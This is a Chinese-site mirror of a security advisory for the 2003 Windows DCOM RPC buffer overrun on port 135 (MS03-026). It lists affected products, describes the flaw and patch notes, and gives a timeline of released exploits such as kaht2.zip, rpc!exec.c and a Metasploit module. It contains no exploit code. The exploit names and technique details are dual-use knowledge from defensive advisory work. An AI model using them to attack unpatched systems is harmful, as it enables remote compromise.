Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Broadband Troubleshooter
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- 不受影响的程序版本

Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- 漏洞讨论

A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system.

This issue may be exposed on other ports that the RPC Endpoint Mapper listens on, such as TCP ports 139, 135, 445 and 593. This has not been confirmed. Under some configurations the Endpoint Mapper may receive traffic via port 80.

** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

August 02, 2003:

There is currently at least one autorooter-enabled IRC bot circulating
which exploits this vulnerability. At this time, the IRC bot does not
appear to be automated into a worm.

August 11, 2003:

An additional exploit (kaht2.zip) has been released.

November 7, 2003:

A new exploit designed to bypass various Windows memory protection schemes is available. The exploit works by using a 'ret-into-libc' chaining procedure, which copies a payload into a newly allocated page modified using undocumented API functions to be executable. This exploit, rpc!exec.c is available below.

An exploit has been released as part of the MetaSploit Framework 2.0.

The following exploits are available:

- 解决方案

eEye has released a free scanning tool for administrators to detect systems vulnerable to this issue. Please check the references section for a link to download this utility.

** Several reports state that the RPC/DCOM service may still be vulnerable to a denial of service attack even if the Microsoft-supplied patch has been applied.

Microsoft has released patches to address this issue. Note that Windows
NT 4.0 Workstation reached its end of life on June 30th, 2003. Because of
this, Microsoft has not released a supported NT 4.0 Workstation patch.
The Windows NT 4.0 Server patch may work on NT 4.0 Workstation, however,
this has not been tested nor is it supported by Microsoft.

** CERT/CC reported an unrelated vulnerability in DCE implementations provided by various vendors that may be triggered by exploits or scanning tools associated with this issue. Please see BID 8371 for further details on the availability of fixes for affected implementations. It should be noted that this is a side-effect that may cause problems with DCE implementations, but does not affect Microsoft Windows itself.

Microsoft has released an update to their advisory stated that while the provided Windows 2000 patch will install on Windows 2000 SP2, it is unsupported. Microsoft recommends users to upgrade to a supported Service Pack. Further information can be found in MS03-026.

Cisco has released an advisory detailing products affected by this vulnerability, as well as making fix information available. Additional details available in referenced advisory.

Microsoft has released new fixes that supersede the original fixes for this issue. Administrators are advised to apply the new patches as they also address BID 8458, 8459, and 8460 in addition to this BID.

HP has made fixes available for OpenVMS.


Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional

Cisco Conference Connection

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows XP 64-bit Edition

Cisco IP Contact Center Express

Microsoft Windows 2000 Professional SP4

Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Cisco Call Manager 1.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.1 (2)

Cisco Call Manager 3.3 (3)

Compaq OpenVMS 6.2 VAX

Compaq OpenVMS 6.2 -1H2 Alpha

Compaq OpenVMS 7.1 VAX

Compaq OpenVMS 7.1 Alpha

Compaq OpenVMS 7.2 Alpha

Compaq OpenVMS 7.2 VAX

Compaq OpenVMS 7.2 -1H1 Alpha

Compaq OpenVMS 7.2 -1H2 Alpha

Compaq OpenVMS 7.2 -2 Alpha

Compaq OpenVMS 7.3 Alpha

Compaq OpenVMS 7.3 -1 Alpha

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站